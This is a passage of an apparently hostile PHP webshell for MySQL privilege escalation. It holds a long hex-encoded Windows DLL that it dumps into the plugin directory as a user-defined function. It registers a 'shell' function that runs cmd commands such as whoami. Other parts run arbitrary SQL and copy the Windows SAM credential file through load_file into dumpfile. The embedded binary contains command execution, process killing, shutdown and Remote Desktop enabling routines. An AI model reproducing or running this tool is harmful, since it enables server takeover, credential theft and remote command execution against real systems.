        echo '<b>Mysql.Func</b> : <font color=white><b><i><font color=red>dont exist!</font></i></b></font> must <a href="?action=func">create</a> mysql.func first!';
    else 
        echo '<b>Mysql.Func</b> : <font color=green>exist!</font>';
    echo '<br/>';
    echo '<b>grants</b> : <font color=white>';
    $meta = mysql_query('show grants;',$conn);
    while ($row = mysql_fetch_row($meta)) {
        echo $row[0];
    }
    echo '</font>';
    echo '</div>';
    if ($close)
        mysql_close($conn);
    echo '<br/>';
    if (isset($_POST['path'])) {
        $path = $_POST['path'];
        if (get_magic_quotes_gpc()) 
            $path = stripslashes($path);
    }
    else
        $path = isset($_SESSION['plugindir']) ? $_SESSION['plugindir'] : 'c:\\\\windows\\\\system32\\\\udf.dll';
    echo '<div style="border:solid 1px #333;background-color:#999;padding:4px"><form action="" method="post"><input type="hidden" name="action" value="install"><input type="text" name="path" size="60" value="'.$path.'"> <input type="submit" value="Dump UDF"></form>';
    echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><input type="hidden" name="dump" value="d"><input type="text" name="sql" size="60" value="CREATE FUNCTION shell RETURNS STRING SONAME \'udf.dll\'"> <input type="submit" value="Create Function"></form>';
    echo '<form action="" method="post"><input type="hidden" name="action" value="copy"><input type="text" value="c:\\\\WINDOWS\\\\repair\\\\sam" name="source" size=30>  <input type="text" name="target" size=30> <input type="submit" value="Copy"> <font color=white>please convert \\ to \\\\</font></form></div>';
    if (isset($_POST['sql']))
        $sql = $_POST['sql'];
    else
        $sql = 'select * from mysql.user';
    if (get_magic_quotes_gpc())
        $sql = stripslashes($sql);
    if (isset($_POST['dump']))
        $sql = 'select shell(\'cmd\',\'whoami\')';
    echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><textarea id="sql2" cols="100" rows="5" name="sql">'.$sql.'</textarea><br/><input type="submit" value="Mysql_query"> <input type="button" value="Load_File" onclick="loadfile()"> <input type="button" value="Into OutFile" onclick="outfile()"></form>';
}
function cplug(){
    $path = $_GET['dir'];
    $path = base64_decode($path);
    $arr = explode('\\',$path);
    $p = '';
    $err = '';
    for ($index = 0,$count = count($arr);$index<$count;$index++) {
        $p .= ($arr[$index] . '\\');
        if (!file_exists($p)) {
            if (!mkdir($p)) {
                $err = 'create '.$p.'failed !';
                break;
            }
        }
    }
    conn();
    if ($err != '')
        exit($err);
    if (file_exists($path))
        echo 'plugin_dir create success !';
    else
        echo 'plugin_dir create failed !';
}
function execsql() {
    $conn = conn(false);
    $sql = $_POST['sql'];
    if (get_magic_quotes_gpc())
        $sql = stripslashes($sql);
    $rs = mysql_query($sql,$conn);
    echo mysql_info($conn);
    if (@mysql_num_rows($rs) > 0) {
        echo '<table border="1">';
        $cols = mysql_num_fields($rs);
        $index = 0;
        echo '<tr>';
        while ($index < $cols) {
            echo '<th>'.mysql_field_name($rs,$index).'</th>';
            $index ++;
        }
        echo '</tr>';
        while ($row = mysql_fetch_row($rs)) {
            $index = 0;
            echo '<tr>';
            while ($index < $cols) {
                echo '<td>';
                echo str_replace(chr(13),'<br/>',htmlspecialchars($row[$index]));
                echo '</td>';
                $index ++;
            }
            echo '</tr>';
         }
        echo '</table>';
    }
    if (mysql_errno($conn) != 0)
        echo mysql_error();
    mysql_close($conn);
}
function cp(){
    $conn = conn(false);
    $source = $_POST['source'];
    $target = $_POST['target'];
    if (get_magic_quotes_gpc()) {
        $source = stripslashes($source);
        $target = stripslashes($target);
    }
    mysql_query('select unhex(hex(load_file("'.$source.'"))) into dumpfile "'.$target.'"');
    if (mysql_errno($conn) != 0)
        echo mysql_error().'<br/>';
    else
        echo 'done !';
    mysql_close($conn);
}
function install() {
//dump udf.dll
    $conn = conn(false);
    $path = $_POST['path'];
    if (get_magic_quotes_gpc()) 
        $path = stripslashes($path);
    mysql_query('create table udftmp (c blob)');
    if (mysql_errno($conn) != 0) {
        echo mysql_error().'<br/>';
        mysql_query('drop table udftmp');
        mysql_close($conn);
        exit();
    }
    mysql_query('insert into udftmp values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A3306000107501C36A01FF74240C6A00FFD00FB6C0C3A12860001085C07521686C4400106860440010FF154040001050FF153C40001085C0A3286000107501C36A01FF742408FFD0C3558BEC83EC6456578D45E8508D45E4506A0133FF5757E85D1400003BC78945DC751F8B75088B3EFF15A040001050681045001056FF570883C40C33C0E929010000538B5D088B0368B844001053FF5008397DE88B75E45959897DF00F86FD0000008D45EC508D45FC506A0E897DFC897DF8897DF4FF3657E8F61300008D45EC508D45F8506A0AFF3657E8E41300008D45EC508D45F4506A05FF3657E8D2130000FF7608E825FFFFFF5957576A208D4D9C51508945E0FF15E4400010598D44000250FF75E05757FF15444000108B45FC83380275280FB64809510FB64808510FB648070FB6400651508D45BC68AC44001050FF150441001083C418EB118D45BC68A444001050FF150441001059598B038D4D9C518D4DBC51FF75F8FF75F4FF7604FF36687C44001053FF500883C420FF75FCE836130000FF75F8E82E130000FF75F4E82613000057E82013000083C60CFF45F08B45F03B45E80F8203FFFFFFFF75E4E8061300008B45DC5B5F5EC9C3560FB774240C85F674426A00566A006A0468E045001068984500106802000080E811FCFFFF83C41C85C08B4424088B08740F56686445001050FF510883C40C5EC3683C45001050FF510859595EC3558BEC83EC0C8365F8008365FC0056576A048D45FC50BF9C460010576870460010BE0200008056C745F401000000E864FBFFFF83C41485C07449837DFC0275436A048D45FC5057684046001056E845FBFFFF83C41485C0742A837DFC0275246A048D45F8506834460010BF004600105756E821FBFFFF83C41485C07406837DF800750432C0EB246A048D45F45068EC4500105756E8FEFAFFFF83C41485C07504B001EB07837DF4000F94C05F5EC9C3E84CFFFFFF84C0B9D04600107505B9C44600108B4424048B105168A446001050FF520883C40CC3558BEC83EC108D45FC5068190002006A0068984500106802000080C745F83D0D0000C745F004000000C745F450000000FF150840001085C075488D45F4508D45F8508D45F0506A0068E0450010FF75FCFF150C40001085C0751FFF75F88B45088B0868F046001050FF510883C40CFF75FCFF1510400010C9C3FF75FCFF15104000108B45088B0868D846001050FF51085959C9C3FF742404E83CFFFFFF59E95DFFFFFF515355565733DB536A02536A04BF9C460010576870460010BE0200008056E84CFAFFFF536A02536A0457684046001056E83AFAFFFF8944244833C0385C24546A010F94C0BF0046001050536A0468EC4500105756E816FAFFFF8BE883C4543BEB7406385C241C742133C0385C241C530F95C050536A0468344600105756E8EDF9FFFF83C41C3BC375043BEB7420395C2410741A385C241C8B4424188B0874076850470010EB126830470010EB0B8B4424188B08680C47001050FF510859595F5E5D5B59C3B802310010E8D10E000083EC18837D0C027D158B45088B0868A047001050FF51085959E9EE00000053565733F656FF75108D4DDCFF750CE8ECF1FFFF68984700108D4DDC8975FCE890F2FFFF8B5D0833FF4785C07415FF75F08BF7FF15FC4000105053E80DFDFFFF83C40C68904700108D4DDCE8FBF1FFFF84C0740357EB1368884700108D4DDCE8E7F1FFFF84C0740C6A00538BF7E8A2FEFFFF595968804700108D4DDCE8CAF1FFFF84C07409538BF7E878FEFFFF5968784700108D4DDCE8B0F1FFFF84C07409538BF7E838FBFFFF5968704700108D4DDCE8FFF1FFFF85C07415FF75F08BF7FF15FC4000105053E8A9FAFFFF83C40C85F6750D8B0368A047001053FF50085959834DFCFF8D4DDCE83CF1FFFF5F5E5B8B4DF433C064890D00000000C9C3568B7424108326006A106890490010FF742414E8BF0D000083C40C85C075108B44240889068B0850FF510433C0EB05B8024000805EC20C008B44240483C00450FF1548400010C20400568B742408578D460450FF154C4000108BF885FF750D85F674098B066A018BCEFF500C8BC75F5EC20400F644240401568BF1C70680490010740756E8C10C0000598BC65EC20400568BF18B861C0100005733FF3BC7740D50FF155840001089BE1C0100008B86180100003BC7740D50FF15A440001089BE180100005757576A0457FF760CFF15544000103BC7898618010000750433C0EB15575757681F000F0050FF155040001089861C0100005F5EC383B91C0100000074128B490C83F9FF740A6A0051FF155C400010C333C0C351FF1548400010C38B4424048B1534600010EB028BC18B48083BCA75F7C38B4424048B1534600010EB028BC18B083BCA75F8C38B5424048B02568B700889328B70083B353460001074038956048B72048970048B49043B51045E7505894104EB0F8B4A043B51087505894108EB028901895008894204C20400568BF18B0E83791400750D8B410439480475058B4108EB1E8B013B0534600010740D50E867FFFFFF59EB0B89068BC88B41043B0874F589065EC3568BF18B0E8B41083B0534600010740D50E855FFFFFF59EB1389068BC88B41043B480874F48B0E394108740289065EC38B44240485C0740E8B4C24088B1189108B4904894804C353568BF133DB895E04C74608A049001068C849001053C706B8490010C74608AC490010FF15D8400010834E0CFF5959885E10899E18010000899E1C010000C78614010000010000008BC65E5BC3558BECB800200000E80C0B00008D451050FF750C8D8500E0FFFF50FF15D44000108B4D088B1183C40C508D8500E0FFFF50FF5204C9C3568BF1E814000000F644240801740756E8A10A0000598BC65EC20400568BF18B861C01000085C0C706B8490010C74608AC490010740750FF15584000108B861801000085C0578B3DA4400010740350FFD78B460C83F8FF740350FFD783BE14010000005F740F8D4610803800740750FF15AC400010C706804900105EC3566820010000E8450A000085C059740B8BC8E8E9FEFFFF8BF0EB0233F685F674068B0656FF50048BC65EC3558BEC518365FC00837D0CFF568BF1750CFF7508E8060A00005989450C837E04FF75106A016A008D4EF8E82100000085C074186A008D45FC50FF750CFF7508FF7604FF15984000108B45FC5EC9C20800558BEC81EC04010000568BF1578DBE1C0100008B0785C0740A50FF15584000108327008DBE180100008B0785C0538B1DA4400010740650FFD38327008B460C83F8FF740750FFD3834E0CFF83BE1401000000740F8D4610803800740750FF15AC400010837D08007412FF75088D7E1057E8E2090000595933DBEB278D85FCFEFFFF506804010000FF156C4000108D7E105733DB53538D85FCFEFFFF50FF156840001053536A02535368000000C057FF156440001083F8FF89460C5B7507C6070033C0EB0C8B450C89861401000033C0405F5EC9C208008B5424048B4208568B308972088B303B353460001074038956048B72048970048B49043B51045E7505894104EB0E8B4A043B1175048901EB038941088910894204C204008B41048B48048B15346000103BCA741A568B7424088B3639710C7D058B4908EB048BC18B093BCA75EE5EC204005356578B7C24103B3D346000108BD98BF7741DFF76088BCBE8E3FFFFFF8B3657E8520800003B3534600010598BFE75E35F5E5BC20400558BEC83EC105356894DF8578B7D0C8D4D0CE8AAFCFFFF8B37A1346000103BF08D5F08897DFC895DF475048B33EB188B0B3BC8741251E8F1FBFFFF8945FC83C0088B30598945F48D4DF0FF15B84000108B45FC3BC774608B0F8941048B0F89083B037505894604EB178B48048B55F4894E048B480489318B0B890A8B0B8941048B5DF88B4B043979047505894104EB0E8B4F04393975048901EB038941088B4F048948048B48148B5714895014894F14897DFC8BC7EB7B8B48048B55F8894E048B4A043979047505897104EB0E8B4F04393975048931EB038971088B4A043939894DF475238B1B3B1D3460001075078B5F048919EB1256E830FBFFFF8B55F8598B4DF489018B45FC8B5A04397B08751F8B0F3B0D3460001075088B4F04894B08EB0D56E8EEFAFFFF8943088B45FC598B5DF833FF473978140F850B010000E9B9000000397E140F85FA0000008B4E048B013BF075728B410883781400751A8978148B460483601400FF76048BCBE8E7FDFFFF8B46048B40088B0839791475088B4808397914746E8B480839791475178B0889791483601400508BCBE8A1FAFFFF8B46048B40088B4E048B49148948148B4E048979148B4008897814FF76048BCBE894FDFFFFEB7F8378140075198978148B460483601400FF76048BCBE860FAFFFF8B46048B008B4808397914751C8B083979147515836014008B76048B43043B70040F853BFFFFFFEB3C8B0839791475178B480889791483601400508BCBE836FDFFFF8B46048B008B4E048B49148948148B4E048979148B00897814FF76048BCBE8FBF9FFFF897E148D4DF0FF15BC400010FF75FCE8E7050000FF4B0C8B4508598B4D0C5F5E89085BC9C20800558BEC51568BF1837E0C008B4D0C74388B46043B087531394510752CFF70048BCEE837FDFFFF8B0D346000108B46048948048B460483660C0089008B46048940088B46048B08EB253B4D107420578BF98D4D0CE8FCF9FFFF578D45FC508BCEE82FFDFFFF8B4D0C3B4D1075E25F8B450889085EC9C20C00558BEC5156578B7D0C578BF1E8A8FCFFFF8B76043BC689450C740C8B0F3B480C7C058D450CEB068975FC8D45FC8B088B45085F89085EC9C20800558BEC51515356576A188BF9E8290500008BF05933DB8D4DF8895E04C74614010000008975FCFF15B8400010391D346000107513893534600010891EA134600010895DFC895808FF05386000108D4DF8FF15BC400010395DFC7409FF75FCE8C0040000598B35346000106A18E8C9040000897004895814894704895F0C5989008B47045F5E8940085BC9C3558BEC5356576A188BD9E8A00400008B7510FF75148BF883671400897704A1346000108907A1346000108947088D470C50E812F9FFFF83C40CFF430C3B730474258B450C3B0534600010751A8B45148B003B460C7C10897E088B43043B7008751C897808EB17893E8B43043BF075088978048B4304EBEA3B30750289388B43043B78048BF70F84B00000008B4604837814000F85A30000008B50048B0A3BC175598B4A0883791400751E8B560433C0408942148941148B46048B4004836014008B46048B7004EB673B7008750A8BF0568BCBE8D9FAFFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE8A0F7FFFFEB358379140074AA3B30750A8BF0568BCBE88AF7FFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE881FAFFFF8B43043B70040F8550FFFFFF8B43048B4004C74014010000008B450889385F5E5B5DC21000558BEC51568BF18B46048B0850518D45FC508BCEE857FDFFFFFF7604E8230300008366040083660C00598D4DFC33F6FF15B8400010FF0D38600010750D8B3534600010832534600010008D4DFCFF15BC40001085F6740756E8E7020000595EC9C3558BEC515356578BF98B47048B70048BD8A1346000103BF0B201741C8B4D0C8B093B4E0C8BDE0F9CC284D274048B36EB038B76083BF075E9807F08007405FF750CEB2684D28BCB894DFC74128B47043B1874EB8D4DFCE8CEF6FFFF8B4DFC8B510C8B450C3B107D195053568D450C508BCFE8D5FDFFFF8B088B4508C6400401EB078B4508C64004005F5E89085BC9C20800568BF18D461450FF15704000108D4E045EE9F8FEFFFF558BEC515153568BF18D461457508945F8FF15784000108D4508508D45FC8D5E04508BCBE8B6FCFFFF8B7DFC3B7E0874198B471085C074068B0850FF5108578D4508508BCBE8B1F9FFFFFF75F8FF15744000105F5E5BC9C20400558BEC5151FF750C8D45F850E8EEFEFFFF8B45088B4DF889088A4DFC884804C9C20800568BF18D4E04C6410800E88DFCFFFF8326008D461450FF157C4000108BC65EC3558BEC83EC108B45088B008365FC008945F88D45F8508D45F050E89EFFFFFF8B0083C010C9C20400558BEC518B4518568B75148326008308FF837D0C00894DFC750CA1146000108906E94A010000538B1DCC400010578B7D1068784A0010FF37FFD385C059590F842301000068744A0010FF37FFD385C059590F8410010000E8E2F6FFFF8BF085F6750E8B4514C700644A0010E9FE00000068604A0010FF37FFD385C0595975158D46085057FF750CE809E4FFFF83C40CE99700000068584A0010FF37FFD385C05959750F8D46085057FF750CE84AE4FFFFEBDA684C4A0010FF37FFD385C05959750F57FF750C8D460850E892EDFFFFEBBC68484A0010FF37FFD385C05959750F57FF750C8D460850E850E7FFFFEB9E68404A0010FF37FFD385C05959750F57FF750C8D460850E8FFF1FFFFEB808D7E088B0768284A001057FF50088B0759596AFFFF35146000108BCFFF50048BCEE88BF3FFFF8B4D1489018BCEE8E8F3FFFF8B5DFC8B4D188D7B14578901FF15784000108D4508508D4B04E87CFEFFFF578930FF1574400010EB07A11460001089065F5B33C05EC9C21400FF742404E80200000059C3FF2500410010FF25F4400010FF25F0400010FF25E8400010CCCCCCCCCCCCCCCCCCCC513D001000008D4C2408721481E9001000002D0010000085013D0010000073EC2BC88BC485018BE18B088B400450C3CCFF25C4400010CCCCCCCCCCCCCCCCCCCC6AFF5064A100000000508B44240C64892500000000896C240C8D6C240C50C3CCFF25E0400010FF25DC400010FF25D04000108B44240885C0750E39053C6000107E2EFF0D3C6000108B0D1041001083F8018B09890D40600010753F6880000000FF150841001085C059A348600010750433C0EB66832000A14860001068046000106800600010A344600010E8EA000000FF053C6000105959EB3D85C07539A14860001085C074308B0D44600010568D71FC3BF072128B0E85C97407FFD1A14860001083EE04EBEA50FF150041001083254860001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D3C60001000EB2683FE01740583FE027522A14C60001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E80BE4FFFF83FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A14C60001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF25C8400010FF2524410010FF2518410010FF251C410010FF2520410010FF2538410010FF253C410010FF25344100108D4DDCE9C2E1FFFFB8884A0010E934FEFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BDF8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D6520202020202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F666600007175657279000000766965770000000064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626